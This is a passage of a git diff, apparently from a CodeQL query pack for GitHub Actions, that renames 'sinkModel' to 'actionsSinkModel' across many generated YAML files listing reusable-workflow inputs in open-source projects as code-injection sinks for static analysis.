addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec48112..93b29308ff27 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e71..c5965c5d8efc 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b4850831911..1fc5159e55a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f4..bce14a98edd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f04..0439d6e1d4ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762f..357e11b3c0ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f577..4d3ea1e91562 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e439939..44b905cab672 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f0..192d975ea573 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf881..627fca5d3ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1ad..4d4fd0f229ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de2..1ceacd2f1c0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb92..ba0f5c06a672 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec5..3c8f11dd0cd8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 6d6f9e177402..b7c00fff318d 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262ff..5a129691bc5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b1..bd07156d06b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec224..b029e3417102 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a95..995e692e4945 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0ae..db325a06baa5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255d..2c91ab62b0c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728d..8fdf39a0bbcf 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a99..00fceb9c7bd2 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bfb..a6b947dfbce7 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57a..9359ea482c03 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9a..023666e67ffb 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb0..7005b7dd7c91 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3ac..8b73f89401a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c94..3cf43b814db7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd16..d33e308c7ebb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9e..5c1de93f08af 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec767..aab9fa502cb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c13..b58fff831e11 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf137..f96264fbf423 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a96..6aaf6aa27834 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e1..d246f4ce6444 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141d..a35a1a628e6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b53..ec22645570f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c1..e0eccb26a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e152..5f85bb1a91ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f638..7f1af3242605 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a6..b06b390e718f 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index ba53c900ce87..d5746b566cc6 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index e43a220a2780..fbe9e286d2b4 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ 